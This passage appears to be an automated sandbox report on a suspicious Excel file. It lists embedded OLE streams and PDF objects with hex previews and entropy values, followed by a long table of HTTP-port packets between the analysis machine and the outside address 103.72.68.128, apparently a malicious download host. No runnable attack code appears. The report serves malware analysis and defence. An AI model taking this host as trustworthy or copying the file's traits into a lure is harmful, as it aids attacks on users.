                                                Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD0010AD53/\x1Ole
                                                CLSID:
                                                File Type:data
                                                Stream Size:64
                                                Entropy:2.892622069467395
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 1 ! O b j e c t 6 9 1 .
                                                Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 53 68 65 65 74 31 21 4f 62 6a 65 63 74 20 36 39 31 00
                                                General
                                                Stream Path:MBD0010AD53/CONTENTS
                                                CLSID:
                                                File Type:PDF document, version 1.4, 1 pages
                                                Stream Size:124841
                                                Entropy:7.657052848938946
                                                Base64 Encoded:True
                                                Data ASCII:% P D F - 1 . 4 . . % . . % . . % w P D F b y W P C u b e d G m b H V 3 . 5 4 x [ 0 ] . . % . . % . . 1 0 o b j . < < / T y p e / M e t a d a t a / S u b t y p e / X M L / L e n g t h 1 4 4 7 > > . . s t r e a m . < ? x p a c k e t b e g i n = " . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > . < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " 3 . 1 - 7 0 1 " > . < r d f : R D F x m l n s : r d f = " h t t p : / / w w w . w 3 .
                                                Data Raw:25 50 44 46 2d 31 2e 34 0d 0a 25 e2 e3 cf d3 0d 0a 25 0d 0a 25 77 50 44 46 20 62 79 20 57 50 43 75 62 65 64 20 47 6d 62 48 20 56 33 2e 35 34 78 5b 30 5d 0d 0a 25 0d 0a 25 0d 0a 31 20 30 20 6f 62 6a 0d 3c 3c 2f 54 79 70 65 2f 4d 65 74 61 64 61 74 61 2f 53 75 62 74 79 70 65 2f 58 4d 4c 2f 4c 65 6e 67 74 68 20 31 34 34 37 20 3e 3e 0d 0a 73 74 72 65 61 6d 0a 3c 3f 78 70 61 63 6b 65 74
                                                General
                                                Stream Path:MBD0010AD54/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:93
                                                Entropy:4.2892020709435155
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD0010AD54/\x1Ole
                                                CLSID:
                                                File Type:data
                                                Stream Size:64
                                                Entropy:2.892622069467395
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 1 ! O b j e c t 6 9 0 .
                                                Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 53 68 65 65 74 31 21 4f 62 6a 65 63 74 20 36 39 30 00
                                                General
                                                Stream Path:MBD0010AD54/CONTENTS
                                                CLSID:
                                                File Type:PDF document, version 1.5
                                                Stream Size:66661
                                                Entropy:7.946317330962055
                                                Base64 Encoded:True
                                                Data ASCII:% P D F - 1 . 5 . % . 2 0 o b j . < < . / P a g e s 4 0 R . / T y p e / C a t a l o g . / O u t p u t I n t e n t s 5 0 R . / M e t a d a t a 6 0 R . / A c r o F o r m 7 0 R . / V e r s i o n / 1 # 2 E 5 . > > . e n d o b j . 6 0 o b j . < < . / T y p e / M e t a d a t a . / S u b t y p e / X M L . / F i l t e r / F l a t e D e c o d e . / L e n g t h 4 5 4 . > > . s t r e a m . . x n 0 . . S X . 6 _ Q . U 4 : m Q . # c . . W M X T . . H > > . } | . l . M . / . T
                                                Data Raw:25 50 44 46 2d 31 2e 35 0a 25 a7 e3 f1 f1 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 61 67 65 73 20 34 20 30 20 52 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 4f 75 74 70 75 74 49 6e 74 65 6e 74 73 20 35 20 30 20 52 0a 2f 4d 65 74 61 64 61 74 61 20 36 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 37 20 30 20 52 0a 2f 56 65 72 73 69 6f 6e 20 2f 31 23 32 45 35 0a 3e 3e 0a 65 6e
                                                General
                                                Stream Path:MBD0010AD55/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:114
                                                Entropy:4.25248375192737
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD0010AD55/\x5DocumentSummaryInformation
                                                CLSID:
                                                File Type:data
                                                Stream Size:708
                                                Entropy:3.6235698530352805
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                                                General
                                                Stream Path:MBD0010AD55/\x5SummaryInformation
                                                CLSID:
                                                File Type:data
                                                Stream Size:372
                                                Entropy:2.8705886273301635
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00
                                                General
                                                Stream Path:MBD0010AD55/Workbook
                                                CLSID:
                                                File Type:Applesoft BASIC program data, first line number 16
                                                Stream Size:97808
                                                Entropy:7.365106814876281
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                                                Data Raw:09 08 10 00 00 06 05 00 aa 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 16, 2023 09:58:23.773436069 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:24.131184101 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:24.131361961 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:24.132147074 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:24.491461992 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:24.491503954 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:24.491516113 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:24.491529942 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:24.491694927 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:24.491694927 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:24.849540949 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:24.849586964 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:24.849627972 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:24.849685907 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:24.849724054 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:24.849895954 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:24.849910021 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:24.849924088 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:24.849931002 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:24.849931955 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:24.849953890 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:24.849978924 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.207694054 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.207711935 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.207787991 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.207928896 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.207928896 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.207967043 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.207969904 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.207993984 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.208018064 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.208061934 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.208112955 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.208120108 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.208234072 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.209842920 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.209857941 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.209871054 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.209883928 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.209897041 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.209908962 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.209913015 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.209923029 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.209928036 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.209934950 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.209947109 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.209953070 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.209964037 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.209969997 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.209991932 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.210006952 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.210158110 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.566236973 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.566266060 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.566282988 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.566314936 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.566338062 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.566374063 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.566387892 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.566438913 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.566469908 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.566488028 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.566514015 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.566514969 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.566529036 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.566551924 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.566589117 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.566632032 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.566646099 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.566684961 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.566723108 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.566759109 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.566818953 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.566859961 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.566914082 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.566947937 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.566998005 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.567032099 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.567672014 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.567712069 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.567723989 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.567758083 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.567809105 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.567845106 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.567857027 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.567857981 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.567892075 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.567938089 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.567997932 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568012953 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.568048954 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568089962 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.568125963 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568126917 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.568160057 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568195105 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.568233967 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568245888 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.568279982 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568295002 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.568331957 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568355083 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.568389893 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568398952 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.568433046 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568483114 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.568510056 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.568516970 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568540096 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568623066 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.568659067 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.568660021 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568691015 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568723917 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.568746090 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.568759918 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.569295883 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.924134016 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.924161911 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.924254894 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.924254894 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.924308062 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.924344063 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.924391031 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.924426079 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.924453974 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.924468994 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.924499989 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.924510956 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.924555063 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.924556971 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.924596071 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.924657106 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.924695015 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.924700975 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.924740076 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.924756050 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.924793005 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.924853086 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.924891949 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.924892902 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.924930096 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.924963951 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925003052 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925007105 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925044060 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925059080 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925096989 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925111055 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925148010 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925156116 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925193071 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925223112 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925260067 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925463915 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925493956 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925504923 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925529957 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925570011 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925600052 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925610065 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925637960 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925652027 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925688982 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925750017 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925791025 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925806046 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925843000 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925856113 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925893068 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925915956 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.925924063 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.925959110 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.926043034 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.926083088 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.926104069 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.926142931 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.926212072 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.926250935 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.926295042 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.926332951 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.926351070 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.926387072 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.926405907 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.926445007 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.926605940 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.926642895 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.926676035 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.926707029 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.926745892 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.926762104 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.926800966 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.926832914 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.926872015 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.926872969 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.926908970 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.926949978 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.926989079 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.927045107 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.927082062 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.927128077 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.927165985 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.927242041 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.927278996 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.927309036 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.927349091 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.927352905 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.927386045 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.927434921 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.927499056 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.927536964 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.927606106 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.927634954 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.927644014 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.927675009 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.927705050 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.927742958 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.927742958 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:25.927786112 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.927815914 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:25.928083897 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.282041073 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.282073975 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.282088995 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.282104969 CEST8049164103.72.68.128192.168.2.22
